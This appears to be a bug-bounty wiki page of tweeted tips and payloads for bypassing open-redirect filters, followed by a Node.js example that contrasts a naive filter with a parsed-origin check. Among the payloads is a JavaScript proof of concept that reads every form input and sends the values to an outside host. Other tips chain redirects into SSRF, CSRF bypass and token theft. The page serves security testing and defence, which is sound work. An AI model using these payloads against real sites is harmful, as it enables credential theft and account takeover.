# Open Redirect

* [file.php?url=/admin/ Redirects to: http://website.com/admin/ Put URL file.php?url=@google.com Now it is website.com@google.com which redirects to http://google.com!](https://twitter.com/LooseSecurity/status/1164579967184887809)
* [#bugbountytip Got an Open Redirect like this before. Website redirected to its own URL with input appended to it. Input @mywebsite.com and alter conf of your site to not prompt for login. URL: victim.com@mywebsite.com (browser thinks http://victim.com  is user). #BugBounty](https://twitter.com/LooseSecurity/status/1078630347464679424)
* [in some cases you can have an Open Redirect using %0d%0a and two "/" directly on the main url: http://victim//%0d%0ahttp://google.com/](https://twitter.com/k33r0k/status/1081589568405671936)
* [#bugbounty #bugbountytip Try to change protocol to bypass open redirect protection. http://example.com  -> ftp://example.com You might be lucky.](https://twitter.com/neeraj_sonaniya/status/1086911248845828101)
* [http:sitetoredirect , http%3asitetoredirect , http%253asitetoredirect mostly works, for open redirect vulnerabilities.](https://twitter.com/h1_kenan/status/1117084793852846080)
* [Hold onto your open redirects. If you ever encounter SSRF then you can bypass same-origin filters using an open redirect. If they're just blocking localhost though, then create a redirect on your own website. #SSRF #infosec #CyberSecurity](https://twitter.com/LooseSecurity/status/1114317490157494272)
* [Bug Bounty Tip: Always check the content of a Redirection Page (302/301), especially if it requires authentication. And remember a Redirection Page is a good place to test issues like CRLF injection and Open Redirection.](https://twitter.com/sandh0t/status/1008636721163067393)
* [For open redirects, try using this character: 。The website thinks it's redirecting to a page on the site, but browsers convert it to a '.' thus completing the redirect. Usage: ?url=//google。com Goes to: https://google.com URL encoded: %E3%80%82](https://twitter.com/LooseSecurity/status/1179149212874952704)
* ["/%0d/domain\_address" is one of the best bypass in account takeover stealing tokens.](https://twitter.com/kunalp94/status/1195321932612169728)
* <https://twitter.com/pdeomare/status/1205402391526486017>
* [Found an interesting open redirect bypass today. Target would only allow \*.target.com, but if you entered hxxp://evil.com%EF%BC%A1.target.com, the backend would return hxxp://evil.com/?.target.com :D #bugbounty #unicode](https://twitter.com/dubs3c/status/1222273089418878976)
* [Bug bounty advice: If you have a GET request where developers added referer-based CSRF protection, use an on-site Open Redirect for this URL to get a whitelisted website in the Referer header. In the case when you have a POST request, try to change a method to GET.](https://twitter.com/0xw2w/status/1248688218326863872)
* [Open Redirect Through HTTP Pollution Attack.\
  \
  URL -> sub.dom-co/go/https/dom-co\
  \
  1) sub.dom-co/go/https/dom-co.evil-co/ -> 404\
  \
  2) sub.dom-co/go/https/dom-co/go/https/dom-co.evil-co/ -> Redirected To Evil website](https://twitter.com/darklotuskdb/status/1260837629718740992)
* [#BugBounty #bugbountytip #infosec For Open Redirects you can bypass a lot of WAF using a special character which a lot of browsers (such as FireFox) convert into a '.' which will complete your URL.\
  \
  The character is: 。\
  Usage: redirecthere。com #CyberSecurity](https://twitter.com/LooseSecurity/status/1074705120804376576)

![](/files/-M7g6EX6DGXjnb7vvpqH)

* When you find XSS over open redirect on sign-in/up pages, just capture the credentials and hijack them. PoC: `javascript:inpts=document.querySelectorAll('input');info='';for(i=0;i<inpts.length;i++){info+=','+inpts[i].value};location.href='https://xhze.em/?'+info`
* Open Redirect Bypass: `/path?redirect=//2130706433` or `/path?redirect=//0x7f000001` will redirect you to 127.0.0.1. Thanks for the tip [@llt4l](https://twitter.com/llt4l) and [@dhyaniji](https://twitter.com/dhyaniji7)
* Many people have DMed me about this bug. As a result, I have consolidated all my processed "Open redirect" reports this month.

  Payloads that bypass most filters:

  `http:http:evil[.]com`, `http\:/evil%252ecom`, `///www.x.com@evil.com`
* When you are looking for bugs like SSRF and Open Redirect and there is a blacklisted character, try to bypass it using other Unicode characters. I found an Open Redirect bypass using the (。) Chinese dot "%E3%80%82". PoC: `redirect_to=////evil%E3%80%82com` [#BugBounty](https://twitter.com/hashtag/BugBounty?src=hashtag_click) [#bugbountytip](https://twitter.com/hashtag/bugbountytip?src=hashtag_click)
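Most of the payloads in the two lists above work for the same reason: the application checks the redirect parameter as a string, while the browser parses it with the WHATWG URL algorithm, which treats `victim.com@` as userinfo, maps U+3002 (。) to `.` during IDNA processing, percent-decodes the host, accepts decimal and hex IPv4 forms, and ignores extra slashes. The following is an added example, not code from the page or from any of the quoted tweets; it uses Node's `URL` class (the same parser browsers implement) to show where each payload actually lands and contrasts a string-based allow check with a check on the parsed origin. The hostnames `victim.com`, `evil.com`, `google.com`, the base path and the filter are illustrative assumptions; the final backslash payload is not from the tips and is included because the parser treats `\` as `/` for http(s) URLs.

```javascript
// Added example (not from the original page or the quoted tweets).
// Assumed target origin and a typical weak redirect filter.
const BASE = 'https://victim.com/account';

// Typical weak filter: block absolute http(s) URLs unless they start with
// our own host, allow everything else. Every payload below passes it.
function naiveAllows(input) {
  const isAbsolute = /^https?:\/\//i.test(input);
  return !isAbsolute
    || input.startsWith('https://victim.com')
    || input.startsWith('http://victim.com');
}

// Hostname a browser would navigate to if `input` were emitted in a
// Location header; relative inputs resolve against BASE as in the browser.
function resolvedHost(input, base = BASE) {
  try {
    return new URL(input, base).hostname;
  } catch {
    return null; // unparseable: the browser would refuse to navigate
  }
}

// Hardened check: parse first, then compare the *resolved origin* (scheme,
// host and port) with our own. Off-origin, unparseable and non-http(s)
// inputs (javascript:, data:, ...) fall back to a safe local path, and only
// path+query+fragment is returned so the caller cannot emit a foreign URL.
function safeRedirectTarget(input, base = BASE) {
  let url;
  try {
    url = new URL(input, base);
  } catch {
    return '/';
  }
  if (url.origin !== new URL(base).origin) return '/';
  return url.pathname + url.search + url.hash;
}

// Constructed inputs, one per tip above (plus the backslash variant).
const PAYLOADS = [
  'http://victim.com@google.com', // userinfo trick: "victim.com" is a username
  '//google。com',                 // U+3002 is IDNA-mapped to '.'
  '//evil%E3%80%82com',           // same character, percent-encoded in the host
  '//2130706433',                 // decimal form of 127.0.0.1
  '//0x7f000001',                 // hex form of 127.0.0.1
  '///www.x.com@evil.com',        // surplus slashes ignored, then userinfo trick
  'http:evil.com',                // bare scheme without slashes (base is https)
  '/\\evil.com',                  // not from the tips: '\' acts as '/' for http(s)
];

// One row per payload: what the weak filter says, where the browser goes,
// and what the hardened check would redirect to instead.
function report(payloads = PAYLOADS) {
  return payloads.map((p) => ({
    payload: p,
    naiveAllows: naiveAllows(p),
    resolvesTo: resolvedHost(p),
    hardened: safeRedirectTarget(p),
  }));
}

console.table(report());
```

Run it with `node` to print the table; every row shows `naiveAllows: true`, an attacker-controlled `resolvesTo`, and `hardened: '/'`. Legitimate same-origin inputs such as `/settings?tab=1` pass `safeRedirectTarget` unchanged, which is the property to keep in mind when the tip about SSRF is applied: the same origin comparison, on the parsed URL, is what a server-side fetcher needs too.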

**Blogs:**

{% embed url="<https://elmahdi.tistory.com/4>" %}
